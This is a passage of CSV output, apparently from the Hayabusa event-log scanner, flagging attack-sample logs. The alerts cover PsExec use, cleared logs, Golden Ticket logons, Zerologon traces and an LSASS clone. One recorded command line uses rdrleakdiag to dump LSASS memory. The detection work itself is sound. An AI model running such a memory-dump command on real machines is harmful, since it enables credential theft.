Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:04.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wermgr.exe -upload",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-21 00:35:28.503 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: hack-admu-test1 : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:36:32.382 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:36:32.391 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP 
Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:06.186 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:14.331 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:17.039 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:35.319 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:35.773 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: JUMP01$ : Share Name: \\*\IPC$ : Share Path: : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:38:23.185 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: not_existing_user : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx +2020-08-21 00:39:15.820 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx +2020-08-21 00:41:58.884 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: not_existing_user : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b90e2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b9a72,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 
10.23.23.9 : Port: 50380 : LogonID: 0x119b9a8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50381 : LogonID: 0x119b9aa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50382 : LogonID: 0x119b9ab2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:55.188 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50317 : LogonID: 0x119b9b27,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:04.967 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b9e04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - 
Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50380 : LogonID: 0x119ba401,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50381 : LogonID: 0x119ba414,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50382 : LogonID: 0x119ba427,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,low,PsExec Tool Execution,,rules/sigma/file_event/file_event_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\PSEXESVC.exe : Path: C:\Windows\PSEXESVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-09-02 20:47:39.499 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 20:47:48.570 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: 04246W-WIN10 : IP Address: 172.16.66.142 : Port: 60726 : LogonID: 0x21a8c68,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 20:47:48.823 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: - : IP Address: 172.16.66.142 : Port: 60728 : LogonID: 0x21a8c80,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 20:47:48.842 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: - : IP Address: 172.16.66.142 : Port: 60726 : LogonID: 0x21a8c9a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-05 22:28:40.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632 : Path: 
C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 22:33:34.590 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 22:34:11.983 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 22:37:07.245 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-09 22:18:23.627 +09:00,MSEDGEWIN10,4625,low,Logon Failure - Wrong Password,User: IEUser : Type: 2 : Workstation: MSEDGEWIN10 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx +2020-09-09 22:18:27.714 
+09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: MSEDGEWIN10 : IP Address: - : Port: - : LogonID: 0x1cd8f6 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx +2020-09-09 22:18:27.714 +09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: MSEDGEWIN10 : IP Address: - : Port: - : LogonID: 0x1cd964 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx +2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx +2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx +2020-09-14 23:44:04.878 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx +2020-09-16 03:04:36.333 +09:00,MSEDGEWIN10,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx +2020-09-16 03:04:39.987 +09:00,MSEDGEWIN10,4648,informational,Explicit Logon,Source User: svc01 : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\inetsrv\w3wp.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx +2020-09-16 04:28:17.594 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-16 04:28:31.453 +09:00,01566s-win16-ir.threebeesco.com,104,high,System log file was cleared,User: a-jbrown,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx +2020-09-16 04:29:51.507 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49707 : LogonID: 0x31ff6e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-16 04:29:51.517 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49707 : LogonID: 0x31ff89,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $ : SID:S-1-5-21-308926384-506822093-3341789130-107103,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $ : SID:S-1-5-21-308926384-506822093-3341789130-107104,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-17 19:57:37.013 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-17 19:57:44.254 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation 02694W-WIN10 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-17 19:57:44.270 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49959 : LogonID: 0x853237,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-24 01:49:41.578 
+09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:49:44.353 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} : Path: C:\Windows\System32\dllhost.exe : User: 3B\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:49:44.380 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85} : Path: C:\Windows\System32\dllhost.exe : User: 3B\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: - : IP Address: 172.16.66.37 : Port: 50106 : LogonID: 0x1136e95,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:16.702 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:16.892 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: - : IP Address: 172.16.66.37 : Port: 50107 : LogonID: 0x1137987,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:17.200 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:19.821 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\wermgr.exe -upload : Path: 
C:\Windows\System32\wermgr.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,"Command: rdrleakdiag.exe /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap : Path: C:\Windows\System32\rdrleakdiag.exe : User: DESKTOP-PIU87N6\wanwan : Parent Command: ""C:\WINDOWS\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,Command: C:\WINDOWS\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,critical,Suspicious LSASS Process Clone,,rules/sigma/process_creation/win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: POC.exe : Path: C:\Users\Public\POC\bin\Debug\POC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 
